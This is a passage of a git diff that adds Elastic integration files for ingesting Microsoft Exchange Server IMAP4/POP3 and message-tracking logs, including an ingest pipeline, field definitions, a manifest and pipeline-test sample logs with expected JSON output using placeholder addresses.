"2024-01-24T15:31:51.435Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,,0,0,0,CloseSession,,,", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:12345", + "command": "CloseSession", + "duration": 0, + "logtype": "pop3", + "rpsize": 0, + "rqsize": 0, + "seqnumber": 1, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:110" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:31:51.067Z", + "event": { + "ingested": "2024-03-06T14:49:25.165888148Z", + "original": "2024-01-24T15:31:51.067Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,1,17,5,user,ccw.altitude,R=OK," + }, + "log": { + "file": { + "path": "Pop3" + } + }, + "message": "2024-01-24T15:31:51.067Z,00000000000ABC12,1,1.2.3.4:110,10.11.12.13:12345,ccw.altitude,1,17,5,user,ccw.altitude,R=OK,", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:12345", + "command": "user", + "context": "R=OK", + "duration": 1, + "logtype": "pop3", + "parameters": "ccw.altitude", + "rpsize": 5, + "rqsize": 17, + "seqnumber": 1, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:110", + "user": "ccw.altitude" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:30:19.847Z", + "event": { + "ingested": "2024-03-06T14:49:25.165893874Z", + "original": "2024-01-24T15:30:19.847Z,00000000000ABC12,2,1.2.3.4:143,10.11.12.13:65468,example123,118,31,34,authenticate,PLAIN,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\"\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\"," + }, + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:19.847Z,00000000000ABC12,2,1.2.3.4:143,10.11.12.13:65468,example123,118,31,34,authenticate,PLAIN,\"R=OK;Msg=\"\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\"\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:65468", + "command": "authenticate", + "context": "R=OK;Msg=\"Proxy:Host123.domain.tld:1993:SSL;ProxySuccess\";LiveIdAR=OK;ActivityContextData=0cb2fd35-94c0-44de-9860-134d27654078", + "duration": 118, + "logtype": "imap4", + "parameters": "PLAIN", + "rpsize": 34, + "rqsize": 31, + "seqnumber": 2, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:143", + "user": "example123" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:30:18.896Z", + "event": { + "ingested": "2024-03-06T14:49:25.165896724Z", + "original": "2024-01-24T15:30:18.896Z,00000000000ABC12,4,1.2.3.4:1993,10.11.12.13:25882,example123,15,18,262,examine,INBOX,\"R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\"\";Budget=\"\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"\"\"," + }, + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:18.896Z,00000000000ABC12,4,1.2.3.4:1993,10.11.12.13:25882,example123,15,18,262,examine,INBOX,\"R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\"\";Budget=\"\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"\"\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:25882", + "command": "examine", + "context": "R=OK;Rows=0;Recent=0;UidValidity=14;UidNext=2644;ActivityContextData=\"Dbl:ST.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:RPC.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0.7692308,I32:RPC.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=13,Dbl:STCPU.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=15,I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=266,I32:ROP.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=827177561,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=10,Dbl:EXR.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,Dbl:BudgUse.T[]=15.0116996765137\";Budget=\"Owner:Sid~S-1-2-34-1234567890-1234567890-123456789-123456~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599988,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_0e36a769-e2a9-4d1d-98df-80be2753326c,IsServiceAccount:False,LiveTime:00:04:30.6615435\"", + "duration": 15, + "logtype": "imap4", + "parameters": "INBOX", + "rpsize": 262, + "rqsize": 18, + "seqnumber": 4, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:1993", + "user": "example123" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:30:18.925Z", + "event": { + "ingested": "2024-03-06T14:49:25.165899267Z", + "original": "2024-01-24T15:30:18.925Z,00000000000ABC12,5,1.2.3.4:1993,10.11.12.13:25882,example123,1,10,26,close,,\"R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\"\";Budget=\"\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"\"\"," + }, + "log": { + "file": { + "path": "Imap4" + } + }, + "message": "2024-01-24T15:30:18.925Z,00000000000ABC12,5,1.2.3.4:1993,10.11.12.13:25882,example123,1,10,26,close,,\"R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\"\";Budget=\"\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"\"\",", + "microsoft": { + "exchange": { + "cip": "10.11.12.13:25882", + "command": "close", + "context": "R=OK;UidValidity=14;UidNext=2644;ActivityContextData=\"I32:MAPI.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=3,I32:MB.C[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,F:MB.AL[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0,Dbl:MAPI.T[Host123.0e36a769-e2a9-4d1d-98df-80be2753326c]=0\";Budget=\"Owner:Sid~S-1-2-34-5678910111-1213141516-171819202-212223~Imap~false,Conn:1,MaxConn:Unlimited,MaxBurst:3600000,Balance:3599993,Cutoff:Unlimited,RechargeRate:600000,Policy:GlobalThrottlingPolicy_81f0fddf-6fcd-4e2e-9330-ca4a38f4057a,IsServiceAccount:False,LiveTime:00:04:30.6905655\"", + "duration": 1, + "logtype": "imap4", + "rpsize": 26, + "rqsize": 10, + "seqnumber": 5, + "sessionid": "00000000000ABC12", + "sip": "1.2.3.4:1993", + "user": "example123" + } + }, + "source": { + "ip": "10.11.12.13" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/agent/stream/filestream.yml.hbs b/packages/microsoft_exchange_server/data_stream/imap4_pop3/agent/stream/filestream.yml.hbs new file mode 100644 index 00000000000..9c5a9235ed8 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/agent/stream/filestream.yml.hbs @@ -0,0 +1,17 @@ +paths: +{{#each paths as |path i|}} + - {{path}} +{{/each}} +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#each tags as |tag i|}} + - {{tag}} +{{/each}} +exclude_files: [".gz$"] +processors: + - add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/elasticsearch/ingest_pipeline/default.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..45e168671e5 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,72 @@ +--- +description: Pipeline for processing sample logs +processors: +- drop: + if: "ctx.message =~ /^[^0-9]/ || ctx.message =~ /^#/" +- set: + field: event.original + copy_from: message +- csv: + field: event.original + ignore_failure: true + ignore_missing: true + target_fields: + - "@timestamp" + - microsoft.exchange.sessionid + - microsoft.exchange.seqnumber + - microsoft.exchange.sip + - microsoft.exchange.cip + - microsoft.exchange.user + - microsoft.exchange.duration + - microsoft.exchange.rqsize + - microsoft.exchange.rpsize + - microsoft.exchange.command + - microsoft.exchange.parameters + - microsoft.exchange.context + - microsoft.exchange.puid +- grok: + field: microsoft.exchange.cip + patterns: + - "%{NOTSPACE:source.ip}:%{NUMBER}" + ignore_missing: true + if: ctx.microsoft?.exchange?.cip != null + ignore_failure: true +- set: + field: microsoft.exchange.logtype + if: ctx.log?.file?.path =~ /Imap4/ + value: imap4 + ignore_empty_value: true + ignore_failure: true +- set: + field: microsoft.exchange.logtype + if: ctx.log?.file?.path =~ /Pop3/ + value: pop3 + ignore_empty_value: true + ignore_failure: true +- convert: + field: microsoft.exchange.duration + type: long + ignore_failure: true +- convert: + field: microsoft.exchange.rpsize + type: long + ignore_failure: true +- convert: + field: microsoft.exchange.rqsize + type: long + ignore_failure: true +- convert: + field: microsoft.exchange.seqnumber + type: long + ignore_failure: true +- set: + field: event.ingested + copy_from: _ingest.timestamp + ignore_failure: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/base-fields.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/base-fields.yml new file mode 100644 index 00000000000..7c798f4534c --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/base-fields.yml @@ -0,0 +1,12 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/ecs.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/ecs.yml new file mode 100644 index 00000000000..e404a5c3aa5 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/ecs.yml @@ -0,0 +1,8 @@ +- external: ecs + name: message +- external: ecs + name: log.file.path +- external: ecs + name: source.ip +- external: ecs + name: tags diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/fields.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/fields.yml new file mode 100644 index 00000000000..f892677c4d6 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/fields/fields.yml @@ -0,0 +1,26 @@ +- name: microsoft.exchange.sessionid + type: keyword +- name: microsoft.exchange.seqnumber + type: long +- name: microsoft.exchange.sip + type: keyword +- name: microsoft.exchange.cip + type: keyword +- name: microsoft.exchange.user + type: keyword +- name: microsoft.exchange.duration + type: long +- name: microsoft.exchange.rqsize + type: long +- name: microsoft.exchange.rpsize + type: long +- name: microsoft.exchange.command + type: keyword +- name: microsoft.exchange.parameters + type: keyword +- name: microsoft.exchange.context + type: keyword +- name: microsoft.exchange.puid + type: keyword +- name: microsoft.exchange.logtype + type: keyword diff --git a/packages/microsoft_exchange_server/data_stream/imap4_pop3/manifest.yml b/packages/microsoft_exchange_server/data_stream/imap4_pop3/manifest.yml new file mode 100644 index 00000000000..c0871a62ea3 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/imap4_pop3/manifest.yml @@ -0,0 +1,30 @@ +title: "Exchange Server IMAP4 POP3" +type: logs +streams: + - input: filestream + title: Exchange Server IMAP4 POP3 Logs + description: Collect Exchange Server IMAP4 POP3 logs + vars: + - name: paths + type: text + title: Paths + multi: true + required: true + show_user: true + default: + - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Imap4\\IMAP*.LOG" + - "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\Pop3\\POP*.LOG" + - name: tags + type: text + title: Tags + multi: true + required: false + show_user: false + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-common-config.yml b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..a06dda74051 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,5 @@ +dynamic_fields: + "event.ingested": ".*" +fields: + tags: + - preserve_original_event diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log new file mode 100644 index 00000000000..6a83935be5c --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log @@ -0,0 +1,4 @@ +2024-01-25T15:16:09.843Z,,,,exchange-mail,No suitable shadow servers,,SMTP,HAREDIRECTFAIL,70971234566456,<20240124222112.B4AE1234EF@host01.my.domain.com>,2fd37dca-1234-5bfb-175d-08dc1db88f52,mailuser@my.domain.com,,15054,1,,,Undelivered Mail Returned to Sender,MAILER-DAEMON@host01.my.domain.com,root@host01.my.domain.com,,Incoming,,,,S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com,Email,dc69df25-1234-564c-41c4-08dc1db88f7f,15.02.0330.005 +2024-01-25T15:16:09.949Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0,exchange-mail\Default exchange-mail,SMTP,RECEIVE,70912345566403,<20240123200014.123F425E28@host01.my.domain.com>,1e6eb197-c6b4-1234-1b69-56dc1db88f50,mailuser@my.domain.com,,7229,1,,,vzdump backup status (host01.my.domain.com): backup successful,root@host01.my.domain.com,root@host01.my.domain.com,0cA: ,Incoming,,10.11.12.13,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,05503123-c5b9-46fe-1234-56dc1db88f8f,15.02.0330.005 +2024-01-25T15:16:14.415Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0,exchange-mail\Default exchange-mail,SMTP,RECEIVE,70912345566407,<20240123200018.123C42553@pve-vhost01.my.domain.com>,c95b5dd1-f520-1234-e6dc-56dc1db8914d,mailuser@my.domain.com,,8251,1,,,vzdump backup status (pve-vhost01.my.domain.com): backup successful,root@pve-vhost01.my.domain.com,root@pve-vhost01.my.domain.com,0cA: ,Incoming,,10.11.12.15,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,d6aef52d-0e05-1234-e29b-56dc1db89238,15.02.0330.005 +2024-01-07T00:00:07.463Z,192.168.0.1,exchange,192.168.0.2,exchange.example.com,;250 2.0.0OK20240107001234.567E6224C8@monitor.example.com[Hostname=exchange.example.com];ClientSubmitTime:,Intra-Organization SMTP Send Connector,SMTP,SEND,29519319995411,20240107001234.567E6224C8@monitor.example.com,0b7099ea-cb95-1234-328e-08dc5f139ac8,uwe.musterman@example.com,250 2.1.5Recipient OK,38663,1,,,ein Titel,support@example.com,support@example.com,2024-01-07T00:00:05.535Z;LSRV=exchange.example.com:TOTAL-HUB=1.921|SMR=0.127(SMRDE=0.002|SMRC=0.125(SMRCL=0.105|X-SMRCR=0.125))|CAT=1.698(CATOS=0.018(CATSM=0.017(CATSM-Malware Agent=0.017))|CATRESL=0.004|CATORES=1.567(CATRS=1.566(CATRS-ScanMail Routing Agent=0.117|CATRS-Transport Rule Agent=0.002(X-ETREX=0.002)|CATRS-Index Routing Agent=1.444))|CATORT=0.108(CATRT=0.107(CATRT-Journal Agent=0.107)))|QDM=0.010|SMSC=0.006(X-SMSDR=0.011)|SMS=0.076(SMSMBXD=0.071),Originating,,,,S:E2ELatency=1.928;S:MsgRecipCount=1;S:IncludeInSla=True;S:Microsoft.Exchange.Transport.MailRecipient.RequiredTlsAuthLevel=Opportunistic;S:IsSmtpResponseFromExternalServer=False;S:DeliveryPriority=Normal;S:AccountForest=example.com,Email,a7ae9ef9-e10c-4111-19bf-08dc0f111bee,15.01.2507.035 diff --git a/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log-expected.json b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log-expected.json new file mode 100644 index 00000000000..d4d03aa0694 --- /dev/null +++ b/packages/microsoft_exchange_server/data_stream/messagetracking/_dev/test/pipeline/test-messagetracking.log-expected.json @@ -0,0 +1,238 @@ +{ + "expected": [ + { + "@timestamp": "2024-01-25T15:16:09.843Z", + "email": { + "direction": "Incoming", + "from": { + "address": [ + "MAILER-DAEMON@host01.my.domain.com" + ] + }, + "local_id": "70971234566456", + "message_id": "<20240124222112.B4AE1234EF@host01.my.domain.com>", + "sender": { + "address": [ + "MAILER-DAEMON@host01.my.domain.com" + ] + }, + "subject": "Undelivered Mail Returned to Sender", + "to": { + "address": [ + "mailuser@my.domain.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855062517Z", + "original": "2024-01-25T15:16:09.843Z,,,,exchange-mail,No suitable shadow servers,,SMTP,HAREDIRECTFAIL,70971234566456,<20240124222112.B4AE1234EF@host01.my.domain.com>,2fd37dca-1234-5bfb-175d-08dc1db88f52,mailuser@my.domain.com,,15054,1,,,Undelivered Mail Returned to Sender,MAILER-DAEMON@host01.my.domain.com,root@host01.my.domain.com,,Incoming,,,,S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com,Email,dc69df25-1234-564c-41c4-08dc1db88f7f,15.02.0330.005" + }, + "message": "2024-01-25T15:16:09.843Z,,,,exchange-mail,No suitable shadow servers,,SMTP,HAREDIRECTFAIL,70971234566456,<20240124222112.B4AE1234EF@host01.my.domain.com>,2fd37dca-1234-5bfb-175d-08dc1db88f52,mailuser@my.domain.com,,15054,1,,,Undelivered Mail Returned to Sender,MAILER-DAEMON@host01.my.domain.com,root@host01.my.domain.com,,Incoming,,,,S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com,Email,dc69df25-1234-564c-41c4-08dc1db88f7f,15.02.0330.005", + "microsoft": { + "exchange": { + "customdata": "S:DeliveryPriority=Normal;S:OriginalFromAddress=root@host01.my.domain.com;S:AccountForest=my.domain.com", + "eventid": "HAREDIRECTFAIL", + "logid": "dc69df25-1234-564c-41c4-08dc1db88f7f", + "networkmessageid": "2fd37dca-1234-5bfb-175d-08dc1db88f52", + "recipientcount": 1, + "returnpath": "root@host01.my.domain.com", + "schemaversion": "15.02.0330.005", + "source": "SMTP", + "sourcecontext": "No suitable shadow servers", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 15054 + }, + "server": { + "domain": "exchange-mail" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:16:09.949Z", + "client": { + "domain": "exchange-mail.my.domain.com", + "ip": "10.11.12.14" + }, + "email": { + "direction": "Incoming", + "from": { + "address": [ + "root@host01.my.domain.com" + ] + }, + "local_id": "70912345566403", + "message_id": "<20240123200014.123F425E28@host01.my.domain.com>", + "sender": { + "address": [ + "root@host01.my.domain.com" + ] + }, + "subject": "vzdump backup status (host01.my.domain.com): backup successful", + "to": { + "address": [ + "mailuser@my.domain.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855089772Z", + "original": "2024-01-25T15:16:09.949Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0,exchange-mail\\Default exchange-mail,SMTP,RECEIVE,70912345566403,<20240123200014.123F425E28@host01.my.domain.com>,1e6eb197-c6b4-1234-1b69-56dc1db88f50,mailuser@my.domain.com,,7229,1,,,vzdump backup status (host01.my.domain.com): backup successful,root@host01.my.domain.com,root@host01.my.domain.com,0cA: ,Incoming,,10.11.12.13,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,05503123-c5b9-46fe-1234-56dc1db88f8f,15.02.0330.005" + }, + "message": "2024-01-25T15:16:09.949Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0,exchange-mail\\Default exchange-mail,SMTP,RECEIVE,70912345566403,<20240123200014.123F425E28@host01.my.domain.com>,1e6eb197-c6b4-1234-1b69-56dc1db88f50,mailuser@my.domain.com,,7229,1,,,vzdump backup status (host01.my.domain.com): backup successful,root@host01.my.domain.com,root@host01.my.domain.com,0cA: ,Incoming,,10.11.12.13,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,05503123-c5b9-46fe-1234-56dc1db88f8f,15.02.0330.005", + "microsoft": { + "exchange": { + "connectorid": "exchange-mail\\Default exchange-mail", + "customdata": "S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.13;S:ProxiedClientHostname=host01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com", + "eventid": "RECEIVE", + "logid": "05503123-c5b9-46fe-1234-56dc1db88f8f", + "messageinfo": "0cA: ", + "networkmessageid": "1e6eb197-c6b4-1234-1b69-56dc1db88f50", + "originalclientip": "10.11.12.13", + "originalserverip": "10.11.12.14", + "recipientcount": 1, + "returnpath": "root@host01.my.domain.com", + "schemaversion": "15.02.0330.005", + "source": "SMTP", + "sourcecontext": "08DC1DB12C345BE5;2024-01-25T15:16:09.544Z;0", + "transporttraffictype": "Email" + } + }, + "network": { + "bytes": 7229 + }, + "server": { + "domain": "exchange-mail", + "ip": "10.11.12.14" + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-25T15:16:14.415Z", + "client": { + "domain": "exchange-mail.my.domain.com", + "ip": "10.11.12.14" + }, + "email": { + "direction": "Incoming", + "from": { + "address": [ + "root@pve-vhost01.my.domain.com" + ] + }, + "local_id": "70912345566407", + "message_id": "<20240123200018.123C42553@pve-vhost01.my.domain.com>", + "sender": { + "address": [ + "root@pve-vhost01.my.domain.com" + ] + }, + "subject": "vzdump backup status (pve-vhost01.my.domain.com): backup successful", + "to": { + "address": [ + "mailuser@my.domain.com" + ] + } + }, + "event": { + "ingested": "2024-03-19T09:29:56.855094378Z", + "original": "2024-01-25T15:16:14.415Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0,exchange-mail\\Default exchange-mail,SMTP,RECEIVE,70912345566407,<20240123200018.123C42553@pve-vhost01.my.domain.com>,c95b5dd1-f520-1234-e6dc-56dc1db8914d,mailuser@my.domain.com,,8251,1,,,vzdump backup status (pve-vhost01.my.domain.com): backup successful,root@pve-vhost01.my.domain.com,root@pve-vhost01.my.domain.com,0cA: ,Incoming,,10.11.12.15,10.11.12.14,S:ProxyHop1=exchange-mail.my.domain.com(10.11.12.14);S:MessageValue=MediumHigh;S:Replication=Failed;S:FirstForestHop=exchange-mail.my.domain.com;S:FromEntity=Internet;S:ProxiedClientIPAddress=10.11.12.15;S:ProxiedClientHostname=pve-vhost01.my.domain.com;S:DeliveryPriority=Normal;S:AccountForest=my.domain.com,Email,d6aef52d-0e05-1234-e29b-56dc1db89238,15.02.0330.005" + }, + "message": "2024-01-25T15:16:14.415Z,10.11.12.14,exchange-mail.my.domain.com,10.11.12.14,exchange-mail,08DC1DB12C345BE9;2024-01-25T15:16:12.885Z;0,exchange-mail\\Default exchange-mail,SMTP,RECEIVE,70912345566407,<20240123200018.123C42553@pve-vhost01.my.domain.com>,c95b5dd1-f520-1234-e6dc-56dc1db8914d,mailuser@my.domain.com,,8251,1,,,vzdump backup status (pve-vhost01.my.domain.com): backup successful,root@pve-vhost01.my.domain.com,root@pve-vhost01.my.domain.com,0cA: 